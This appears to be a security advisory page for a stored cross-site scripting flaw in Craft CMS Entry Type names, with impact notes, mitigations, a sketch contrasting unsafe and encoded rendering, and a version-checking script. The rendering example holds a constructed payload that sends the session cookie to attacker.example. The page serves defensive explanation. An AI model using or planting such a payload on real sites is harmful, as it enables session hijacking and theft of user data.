CVE-2026-25491: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in craftcms cms
CVE-2026-25491 is a stored cross-site scripting (XSS) vulnerability in Craft CMS versions from 5.0.0-RC1 up to and including 5.8.21. The issue arises because Entry Type names are not properly sanitized when displayed in the Entry Types list, allowing malicious scripts to be stored and executed in other users' browsers. Triggering it requires authenticated access with high privileges and user interaction. Although the CVSS score is low (1.9), the vulnerability can lead to limited confidentiality and integrity impacts. The flaw is fixed in version 5.8.22.
AI Analysis
Technical Summary
CVE-2026-25491 is a stored cross-site scripting (XSS) vulnerability in Craft CMS, a widely used content management system. It affects versions from 5.0.0-RC1 through 5.8.21 and is classified as CWE-79, improper neutralization of input during web page generation. Entry Type names, which are user-configurable labels within the CMS, are rendered into the Entry Types list in the control panel without being encoded for HTML. An attacker who already holds the privileges needed to create or modify Entry Types can therefore store a name containing JavaScript; the script executes in the browser of any other user who views that list. Possible consequences are actions performed in the victim's session (for example creating users or changing settings, if the victim is an administrator), theft of data visible in the control panel and, where session cookies are readable by script, session hijacking. Exploitation requires both high privileges and user interaction (a victim viewing the list), which limits its scope. The CVSS 4.0 vector reflects this: network attack vector, low attack complexity, high privileges required (PR:H) and passive user interaction required (UI:P); the confidentiality and integrity impacts are low and there is no availability impact. The issue was fixed in Craft CMS 5.8.22 by encoding Entry Type names before display. No public exploit has been reported to date, but unpatched installations remain exposed to abuse by insiders or by compromised high-privilege accounts.
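The rendering pattern behind CWE-79 here, shown as an added JavaScript example that is not Craft's own control-panel code: an Entry Type name is interpolated into an HTML table row, once without encoding (the bug class) and once with HTML entity encoding (the fix class), followed by a small check that flags tags the template did not emit. The payload, the row markup, the `/admin/settings/entry-types/` path and all helper names are constructed for this example; Craft's real templates and markup differ.

```javascript
// Added example (not Craft CMS code): stored XSS through an unencoded Entry
// Type name, beside the output-encoded version of the same rendering.

// Constructed payload: a name an attacker with permission to edit Entry Types
// could store. It is inert in the database and only fires when rendered raw.
const MALICIOUS_NAME =
  'News <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Constructed record standing in for a row of the Entry Types list.
const SAMPLE_ENTRY_TYPE = { id: 3, name: MALICIOUS_NAME, handle: 'news' };

// HTML entity encoding suitable for text nodes and double-quoted attributes.
// Ampersand must be replaced first so already-encoded output is not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: the stored name is concatenated straight into markup,
// so any tag inside it becomes part of the page.
function renderRowUnsafe(entryType) {
  return (
    `<tr><td><a href="/admin/settings/entry-types/${entryType.id}">${entryType.name}</a></td>` +
    `<td><code>${entryType.handle}</code></td></tr>`
  );
}

// Hardened pattern: every untrusted value is encoded for the context it lands
// in (entity-encoded for HTML text, URL-encoded for the path segment).
function renderRowSafe(entryType) {
  return (
    `<tr><td><a href="/admin/settings/entry-types/${encodeURIComponent(entryType.id)}">` +
    `${escapeHtml(entryType.name)}</a></td>` +
    `<td><code>${escapeHtml(entryType.handle)}</code></td></tr>`
  );
}

// Tags the template itself is allowed to emit; anything else in the rendered
// markup arrived through interpolated data. Useful as a unit test on views or
// as a coarse check over rendered admin pages.
const TEMPLATE_TAGS = new Set(['tr', 'td', 'a', 'code']);

function unexpectedTags(html) {
  const found = new Set();
  for (const m of html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)) {
    const tag = m[1].toLowerCase();
    if (!TEMPLATE_TAGS.has(tag)) found.add(tag);
  }
  return [...found];
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', unexpectedTags(renderRowUnsafe(SAMPLE_ENTRY_TYPE)));
  console.log('safe:  ', unexpectedTags(renderRowSafe(SAMPLE_ENTRY_TYPE)));
}
```

In Craft's Twig templates the counterpart of `escapeHtml` is the default autoescaping; the counterpart of `renderRowUnsafe` is passing a user-controlled value through `|raw` or building markup by string concatenation in PHP or JavaScript. Note that the `onerror=` text is still present in the safe output, only entity-encoded, which is why a check should look for real tags rather than grep for attribute names.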
Potential Impact
For European organizations, this vulnerability could lead to targeted attacks against users with access to Craft CMS administrative interfaces. Exploitation could result in session hijacking or unauthorized actions performed in the context of a legitimate user, potentially compromising sensitive content or administrative controls. Although the CVSS score is low, the risk is elevated in environments where multiple users manage content and where attackers can gain or already have high-level access. The impact on confidentiality and integrity is limited but non-negligible, especially for organizations handling sensitive or regulated data. Disruption of content management workflows and potential reputational damage could also occur if malicious scripts are injected and executed. The lack of known exploits reduces immediate risk, but the widespread use of Craft CMS in Europe, particularly in media, education, and government sectors, means that unpatched systems remain vulnerable. Attackers could leverage this flaw as part of a broader attack chain, especially in targeted campaigns.
Mitigation Recommendations
European organizations should take the following steps:
- Upgrade Craft CMS to version 5.8.22 or later, where the vulnerability is fixed. Confirm the version actually deployed (for example from the control panel) rather than relying on the constraint in composer.json.
- Limit the number of users with permission to create or modify Entry Types; only roles that genuinely administer content structure should hold it, since this permission is the entry point for the attack.
- In your own Twig templates and plugins, leave autoescaping on and never pass Entry Type names or other user-configurable labels through `|raw`; the same class of bug is easy to reintroduce in custom code.
- Deploy a Content Security Policy that restricts where scripts may load from and execute. Test it against the control panel before enforcing it, because the control panel relies on inline scripts and an overly strict policy will break it.
- Monitor CMS logs and Entry Type records for unexpected changes, in particular names containing `<`, `>`, `javascript:` or `on...=` attribute text.
- Conduct regular security audits and penetration testing focused on the control panel and installed plugins.
- Educate administrators and content managers about XSS risks and the importance of applying security updates promptly.
- If upgrading is not immediately possible, restrict access to the control panel to trusted users via network controls or a VPN, and review existing Entry Type names for injected markup.
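A quick way to answer "is this install in the affected range?" from a project's lock file, as an added example in JavaScript that is not part of the advisory or of Craft: it reads the `craftcms/cms` entry from `composer.lock` and compares it against 5.0.0-RC1 (first affected) and 5.8.22 (fixed), handling prerelease tags so that 5.0.0-RC1 sorts before 5.0.0. The lock-file fragment is constructed for the example; it assumes `composer.lock` lists the package under `packages` with a `version` string such as `5.8.21` or `5.0.0-RC1`.

```javascript
// Added example (not Craft's code): affected-version check for CVE-2026-25491
// driven by composer.lock. Range from the advisory: 5.0.0-RC1 <= v <= 5.8.21.

// Constructed composer.lock fragment so the example runs offline.
const SAMPLE_LOCK = JSON.stringify({
  packages: [
    { name: 'twig/twig', version: 'v3.21.1' },
    { name: 'craftcms/cms', version: '5.8.21' },
  ],
});

const AFFECTED_FROM = '5.0.0-RC1';
const FIXED_IN = '5.8.22';

// Parse "5.8.21", "v5.8.22", "5.0.0-RC1" or "5.0.0-beta.2" into parts.
// A prerelease sorts before the same numeric version (5.0.0-RC1 < 5.0.0),
// and prerelease tags compare lexically (alpha < beta < rc).
function parseVersion(str) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d*))?$/.exec(str.trim());
  if (!m) throw new Error(`unrecognised version: ${str}`);
  const pre = m[4] ? { tag: m[4].toLowerCase(), num: m[5] ? Number(m[5]) : 0 } : null;
  return { major: Number(m[1]), minor: Number(m[2]), patch: Number(m[3]), pre };
}

function compareVersions(a, b) {
  const va = parseVersion(a);
  const vb = parseVersion(b);
  for (const k of ['major', 'minor', 'patch']) {
    if (va[k] !== vb[k]) return va[k] < vb[k] ? -1 : 1;
  }
  if (!va.pre && !vb.pre) return 0;
  if (!va.pre) return 1;  // a release is newer than any prerelease of itself
  if (!vb.pre) return -1;
  if (va.pre.tag !== vb.pre.tag) return va.pre.tag < vb.pre.tag ? -1 : 1;
  return Math.sign(va.pre.num - vb.pre.num);
}

// True when AFFECTED_FROM <= version < FIXED_IN.
function isAffected(version) {
  return compareVersions(version, AFFECTED_FROM) >= 0 && compareVersions(version, FIXED_IN) < 0;
}

// Pull the installed craftcms/cms version out of a composer.lock document.
function craftVersionFromLock(lockJson) {
  const lock = JSON.parse(lockJson);
  const pkg = (lock.packages || []).find((p) => p.name === 'craftcms/cms');
  if (!pkg) throw new Error('craftcms/cms not found in composer.lock');
  return pkg.version;
}

function checkLock(lockJson) {
  const version = craftVersionFromLock(lockJson);
  return { version, affected: isAffected(version) };
}

if (typeof require !== 'undefined' && require.main === module) {
  // Real use: node check.js < composer.lock; falls back to the sample here.
  const fs = require('fs');
  const input = process.stdin.isTTY ? SAMPLE_LOCK : fs.readFileSync(0, 'utf8');
  console.log(checkLock(input));
}
```

The lock file only says what was resolved at install time; cross-check the result against the version the running control panel reports, because a stale lock file or a deployment that skipped `composer install` will give a misleading answer.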
Affected Countries
United Kingdom, Germany, France, Netherlands, Sweden, Belgium
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-02-02T16:31:35.823Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 698a36084b57a58fa16ab205
Added to database: 2/9/2026, 7:31:20 PM
Last enriched: 2/9/2026, 7:47:30 PM
Last updated: 2/9/2026, 8:38:24 PM
Related Threats
- CVE-2026-25740: CWE-250: Execution with Unnecessary Privileges in NixOS nixpkgs (Medium)
- CVE-2026-25528: CWE-918: Server-Side Request Forgery (SSRF) in langchain-ai langsmith-sdk (Medium)
- CVE-2026-25498: CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') in craftcms cms (High)
- CVE-2026-2246: Memory Corruption in AprilRobotics apriltag (Medium)
- CVE-2026-25497: CWE-639: Authorization Bypass Through User-Controlled Key in craftcms cms (High)